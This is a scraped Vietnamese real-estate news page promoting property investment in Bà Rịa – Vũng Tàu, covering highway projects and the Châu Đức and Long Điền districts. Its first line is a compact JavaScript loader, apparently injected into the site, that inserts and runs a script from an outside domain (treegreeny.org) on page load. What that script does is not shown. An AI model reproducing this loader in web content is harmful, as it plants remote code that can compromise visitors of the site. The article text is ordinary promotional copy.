;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lợi thế đầu tư bất động sản Bà Rịa - Vũng Tàu

Lợi thế đầu tư bất động sản Bà Rịa – Vũng Tàu

Show all

Lợi thế đầu tư bất động sản Bà Rịa – Vũng Tàu

bat-dong-san-vug-tau

Thứ sáu, 22/4/2022  |  10:00  |  Tin tức, Tin thị trường

Bất động sản Bà Rịa – Vũng Tàu hưởng lợi từ hàng loạt dự án hạ tầng đang triển khai tại tỉnh; tạo ra liên kết vùng kinh tế đến TP. HCM và những tỉnh thành lân cận.

Bà Rịa- Vũng Tàu tỏa sáng trong xu hướng phát triển đô thị vệ tinh

Với tốc độ đô thị hóa nhanh, nhiều chuyên gia dự đoán, phát triển đô thị vệ tinh sẽ là xu hướng sắp tới tại các đô thị lớn tại Việt Nam. Điều này giải quyết những áp lực đô thị trung tâm; tạo hệ thống hạ tầng thông suốt và phân bố lại dân cư một cách cân đối.

Những địa phương nằm gần các đô thị lớn sẽ trở thành điểm đến xây dựng các khu đô thị mới. Vùng ven đô, nơi có khoảng không gian sống thoáng và rộng rãi hơn sẽ đáp ứng nhu cầu an cư. Nơi đây đủ gần để tiếp cận dịch vụ, tiện ích tại các trung tâm thành phố lớn mà vẫn có không gian sống trong lành, gần gũi với thiên nhiên.

Những năm gần đây, Bà Rịa – Vũng Tàu không ngừng nâng cấp và hoàn thiện hệ thống hạ tầng giao thông; tăng tính kết nối giữa các khu công nghiệp, hệ thống cảng, hậu cần cảng và các tuyến đường. 

Giao thông là điểm tựa lớn của bất động sản Bà Rịa – Vũng Tàu

Hàng loạt dự án kết nối khu vực đã và đang triển khai tại Bà Rịa – Vũng Tàu. Cụ thể như cao tốc Biên Hòa – Vũng Tàu. Tuyến đường này đáp ứng nhu cầu vận chuyển hàng hóa từ cảng Cái Mép – Thị Vải và các khu công nghiệp.

Khi cao tốc Biên Hòa – Vũng Tàu đi vào hoạt động sẽ rút ngắn thời gian di chuyển từ thị xã Phú Mỹ đến sân bay Long Thành, TP. HCM, các tỉnh Đông Nam Bộ, Tây Nam Bộ… Theo đánh giá của nhiều chuyên gia, trong tương lai, các khu dân cư nằm trên trục kết nối lên cao tốc sẽ mang lại giá trị lớn cho các nhà đầu tư.

Ngoài ra, còn có cao tốc xuyên Á kết nối vùng kinh tế phía Nam với các nước Campuchia, Thái Lan, Malaysia; đường sắt Biên Hòa – Vũng Tàu; cao tốc Bến Lức – Long Thành kết nối các tỉnh Đông Nam Bộ và Tây Nam Bộ, Quốc lộ 51, cầu Phước An, đường Long Sơn – Cái Mép… Đây đều là những dự án hạ tầng giúp gia tăng tiềm năng phát triển cho bất động sản Bà Rịa – Vũng Tàu.

bat-dong-san-vug-tau

 

Nhiều huyện thị thuộc Bà Rịa – Vũng Tàu được chú ý

Một số địa phương được hưởng lợi tại Bà Rịa – Vũng Tàu như huyện Châu Đức, huyện Long Điền,… Với hệ thống hạ tầng giao thông phát triển đồng bộ cùng vị trí kết nối các khu công nghiệp trong vùng 2 huyện này đang sở hữu nhiều tiềm năng phát triển bất động sản.

Châu Đức nằm trong chiến lược phát triển kinh tế phía Nam

Trong chiến lược chung của quy hoạch phát triển kinh tế – xã hội Vùng kinh tế trọng điểm phía Nam và của tỉnh Bà Rịa – Vũng Tàu, huyện Châu Đức tập trung khai thác những lợi thế riêng về vị trí địa lý, giao thông, tiềm năng đất đai; tạo ra những bước phát triển đột phá có tính chất quyết định để chuyển đổi mạnh mẽ về chất của nền kinh tế.

Châu Đức đang tranh thủ các tác động, ảnh hưởng lan tỏa tích cực từ sự phát triển mạnh mẽ các cơ sở công nghiệp lớn do trung ương và đầu tư nước ngoài, đầu tư trong nước… trên địa bàn huyện, tỉnh và các trung tâm công nghiệp như Đồng Nai và TP. HCM, Bình Dương; chú trọng phát triển các ngành công nghiệp là cơ sở vệ tinh cho các nhà máy, khu công nghiệp lớn.

Theo dự báo dân số huyện Châu Đức đến năm 2030 khoảng 210.000 người. Trong đó khoảng 22-25% dân số đô thị và 75-78% dân số nông thôn. Để đảm bảo  nhu cầu đất ở cho dân số nói trên cần thiết phải quy hoạch chỉnh trang các khu dân cư hiện có và phát triển các khu dân cư mới đáp ứng nhu cầu đất ở; dịch vụ công cộng cho người dân với mức sống có chất lượng cao. Và đây cũng chính là dấu  hiệu tích cực cho bất động sản Châu Đức.

Bất động sản Long Điền hưởng trọn hệ thống giao thông đồng bộ

Với trí đắc địa, huyện Long Điền có tuyến Quốc lộ 44A đi qua cùng 28 km đường bờ biển. Sự phát triển của mạng lưới hạ tầng giao thông đã tạo cho khu vực này dáng dấp của một khu kinh tế trọng điểm.

Những năm gần đây, Long Điền đẩy mạnh chuyển đổi cơ cấu kinh tế theo hướng thương mại – dịch vụ – du lịch; kỳ vọng thu hút nguồn vốn bất động sản mạnh mẽ trong thời gian tới.

Là địa phương tiếp giáp trực tiếp với TP. Vũng Tàu, TP. Bà Rịa và huyện Xuyên Mộc, lại có lợi thế sở hữu đường bờ biển dài hơn 28km. Cùng cảng cá lớn nhất tỉnh là Phước Tỉnh, bất động sản Long Điền đang chứng tỏ sức hút cực lớn đối với giới đầu tư.

Theo khảo sát của CBRE Việt Nam, giá trị bất động sản ở những vị trí vàng như Long Điền, Phú Mỹ, Tân Thành,… đều tăng từ 20% – 30% trong vài năm trở lại đây. Trong đó, cá biệt có một số dự án pháp lý hoàn chỉnh, hạ tầng đồng bộ mức tăng đáng kể lên đến 40-50% trong vòng 1 năm.

Theo các chuyên gia bất động sản, khi hạ tầng phát triển nhanh chóng, thời gian tới bất động sản Bà Rịa – Vũng Tàu sẽ đáp ứng được nhu cầu về nhà ở rất lớn của các chuyên gia, chuyên viên, kỹ sư làm việc ở cụm cảng Cái Mép – Thị Vải và các khu công nghiệp.

Xem thêm:

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Tin Nổi Bật
0888 69 7779